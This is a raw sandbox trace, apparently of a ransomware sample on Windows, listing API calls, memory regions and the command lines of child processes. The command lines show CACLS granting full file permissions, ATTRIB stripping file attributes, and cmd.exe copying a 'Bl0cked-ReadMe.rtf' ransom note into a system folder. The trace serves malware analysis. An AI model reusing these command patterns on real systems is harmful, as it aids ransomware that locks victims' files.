WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0147.263] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f5bc | out: lpExitCode=0x30f5bc*=0x0) returned 1 [0147.263] CloseHandle (hObject=0x4c) returned 1 [0147.263] _vsnwprintf (in: _Buffer=0x30f704, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f5c8 | out: _Buffer="00000000") returned 8 [0147.263] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.263] GetEnvironmentStringsW () returned 0xc2480* [0147.264] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.264] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.264] GetEnvironmentStringsW () returned 0xc2480* [0147.264] FreeEnvironmentStringsW (penv=0xc2480) returned 1 [0147.264] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f620 | out: lpAttributeList=0x30f620) [0147.264] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.264] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.264] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.264] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.264] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.264] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.265] SetConsoleInputExeNameW () returned 0x1 [0147.265] GetConsoleOutputCP () returned 0x1b5 [0147.265] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.265] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.265] exit (_Code=0) Process: id = "211" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16b60" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xb10" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18215 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18216 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18217 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18218 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18219 start_va = 0x5b0000 end_va = 0x5b8fff entry_point = 0x5b0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 18220 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18221 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" 
Region: id = 18223 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 18224 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18225 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18226 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18227 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18228 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 18229 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 18230 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18231 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18232 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18233 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = 
"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18234 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18235 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18236 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 268 os_tid = 0xbf8 Thread: id = 269 os_tid = 0xbd8 Process: id = "212" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16b40" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "210" os_parent_pid = "0xb10" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18237 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18238 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18239 start_va = 0x40000 end_va = 0x40fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18240 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 18241 start_va = 0x5f0000 end_va = 0x5f6fff entry_point = 0x5f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18242 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18243 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18244 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18245 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18246 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18247 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18248 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18249 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 18250 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18251 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 18252 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18253 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18254 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18255 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18256 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18257 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18258 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18259 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = 
"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18260 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18261 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18262 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18263 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18264 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 18265 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18266 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 270 os_tid = 0xbc0 Process: id = "213" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18267 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18268 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18269 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18270 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 18271 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18272 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18273 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18274 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 
18275 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 18276 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18287 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18288 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18289 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18290 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 18291 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18292 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18293 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18294 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18295 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 18296 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18297 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18298 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18299 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18300 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18301 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 18302 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18303 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18304 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 18305 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18306 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 18307 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 18308 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 18309 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 18310 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 271 os_tid = 0xb24 [0147.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fcb4 | out: lpSystemTimeAsFileTime=0x14fcb4*(dwLowDateTime=0x91c1d120, dwHighDateTime=0x1d440a9)) [0147.350] GetCurrentProcessId () returned 0xbe0 [0147.350] GetCurrentThreadId () returned 0xb24 [0147.350] GetTickCount () returned 0x2dc79 [0147.350] QueryPerformanceCounter (in: lpPerformanceCount=0x14fcac | out: lpPerformanceCount=0x14fcac*=20413966970) returned 1 [0147.351] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.351] __set_app_type (_Type=0x1) [0147.351] __p__fmode () returned 0x76b331f4 [0147.351] __p__commode () returned 0x76b331fc [0147.351] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.351] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.352] GetCurrentThreadId () returned 0xb24 [0147.352] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb24) returned 0x38 [0147.352] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.352] 
GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0147.352] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.352] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.352] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fc44 | out: phkResult=0x14fc44*=0x0) returned 0x2 [0147.352] VirtualQuery (in: lpAddress=0x14fc7b, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.352] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fc14, dwLength=0x1c | out: lpBuffer=0x14fc14*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.352] GetConsoleOutputCP () returned 0x1b5 [0147.352] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.352] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0147.352] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0147.352] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0147.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.353] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.353] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.353] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.353] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.353] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.353] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0147.353] GetEnvironmentStringsW () returned 0x3401c8* [0147.353] FreeEnvironmentStringsW (penv=0x3401c8) returned 1 [0147.354] GetEnvironmentStringsW () returned 0x3401c8* [0147.354] FreeEnvironmentStringsW (penv=0x3401c8) returned 1 [0147.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebb4 | out: phkResult=0x14ebb4*=0x40) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: 
lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegCloseKey (hKey=0x40) returned 0x0 [0147.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ebb4 | out: phkResult=0x14ebb4*=0x40) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x40, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x4) returned 0x0 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x0, lpData=0x14ebc0*=0x1, lpcbData=0x14ebb8*=0x1000) returned 0x2 [0147.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14ebbc, lpData=0x14ebc0, lpcbData=0x14ebb8*=0x1000 | out: lpType=0x14ebbc*=0x4, lpData=0x14ebc0*=0x0, lpcbData=0x14ebb8*=0x4) 
